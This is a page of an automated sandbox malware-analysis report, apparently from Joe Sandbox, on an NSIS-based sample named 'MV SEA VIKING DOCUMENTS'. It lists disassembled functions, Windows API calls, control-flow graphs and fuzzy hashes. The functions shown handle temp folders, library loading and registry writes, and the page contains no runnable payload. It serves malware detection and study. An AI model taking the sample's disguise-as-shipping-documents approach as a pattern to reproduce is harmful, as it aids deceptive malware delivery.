                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp$C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll$Call
                                                                                                                                                                                                                                • API String ID: 1941528284-848832303
                                                                                                                                                                                                                                • Opcode ID: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                                                                                                                                                                                                • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040559F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 635 40559f-4055b4 636 4055ba-4055cb 635->636 637 40566b-40566f 635->637 638 4055d6-4055e2 lstrlenW 636->638 639 4055cd-4055d1 call 40657a 636->639 641 4055e4-4055f4 lstrlenW 638->641 642 4055ff-405603 638->642 639->638 641->637 643 4055f6-4055fa lstrcatW 641->643 644 405612-405616 642->644 645 405605-40560c SetWindowTextW 642->645 643->642 646 405618-40565a SendMessageW * 3 644->646 647 40565c-40565e 644->647 645->644 646->647 647->637 648 405660-405663 647->648 648->637
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,00000000,00425A20,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,00000000,00425A20,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,00403418), ref: 004055FA
                                                                                                                                                                                                                                • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll), ref: 0040560C
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,00000000), ref: 00406779
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                                                                                                                                                                • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll
                                                                                                                                                                                                                                • API String ID: 1495540970-3234598986
                                                                                                                                                                                                                                • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                                                                                                                                                                                • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040689A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 887 40689a-4068ba GetSystemDirectoryW 888 4068bc 887->888 889 4068be-4068c0 887->889 888->889 890 4068d1-4068d3 889->890 891 4068c2-4068cb 889->891 893 4068d4-406907 wsprintfW LoadLibraryExW 890->893 891->890 892 4068cd-4068cf 891->892 892->893
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 004068EC
                                                                                                                                                                                                                                • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                                                • API String ID: 2200240437-1946221925
                                                                                                                                                                                                                                • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                                                                                • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405A6E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 1041 405a6e-405ab9 CreateDirectoryW 1042 405abb-405abd 1041->1042 1043 405abf-405acc GetLastError 1041->1043 1044 405ae6-405ae8 1042->1044 1043->1044 1045 405ace-405ae2 SetFileSecurityW 1043->1045 1045->1042 1046 405ae4 GetLastError 1045->1046 1046->1044
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00405AC5
                                                                                                                                                                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00405AE4
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                • API String ID: 3449924974-3355392842
                                                                                                                                                                                                                                • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                                                                • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 71491817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 71491BFF: GlobalFree.KERNEL32(?), ref: 71491E74
                                                                                                                                                                                                                                  • Part of subcall function 71491BFF: GlobalFree.KERNEL32(?), ref: 71491E79
                                                                                                                                                                                                                                  • Part of subcall function 71491BFF: GlobalFree.KERNEL32(?), ref: 71491E7E
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 714918C5
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 7149194B
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 71491970
                                                                                                                                                                                                                                  • Part of subcall function 7149243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7149246F
                                                                                                                                                                                                                                  • Part of subcall function 71492810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,71491896,00000000), ref: 714928E0
                                                                                                                                                                                                                                  • Part of subcall function 71491666: wsprintfW.USER32 ref: 71491694
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2329312091.0000000071491000.00000020.00000001.01000000.00000005.sdmp, Offset: 71490000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329262917.0000000071490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329365746.0000000071494000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329401536.0000000071496000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_71490000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3962662361-3916222277
                                                                                                                                                                                                                                • Opcode ID: 4ce172791e3e09c79f71b9b1a85dc5af3d47354e752cef5c743868666a101e88
                                                                                                                                                                                                                                • Instruction ID: 114c61f187d66a27ea582fd41f85167a194b37ef7136ec77d45efa8d7c951e71
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ce172791e3e09c79f71b9b1a85dc5af3d47354e752cef5c743868666a101e88
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4241C2B28042029FEB119F20D984F953FBCAF14774F14446AED4BAE286DB74C484C7A8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,00000023,00000011,00000002), ref: 004024D5
                                                                                                                                                                                                                                • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,00000000,00000011,00000002), ref: 00402515
                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseValuelstrlen
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp
                                                                                                                                                                                                                                • API String ID: 2655323295-4141617732
                                                                                                                                                                                                                                • Opcode ID: c2e77ddd5f06e5ba6494e1e5615a57a5b42731a95510819d931e3bca28b8233c
                                                                                                                                                                                                                                • Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2e77ddd5f06e5ba6494e1e5615a57a5b42731a95510819d931e3bca28b8233c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405F14 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,?,00405F2B,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp
                                                                                                                                                                                                                                • API String ID: 3248276644-3444943300
                                                                                                                                                                                                                                • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                                                                                                                                                                • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040605C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040607A
                                                                                                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                                                • API String ID: 1716503409-944333549
                                                                                                                                                                                                                                • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                                                                                • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
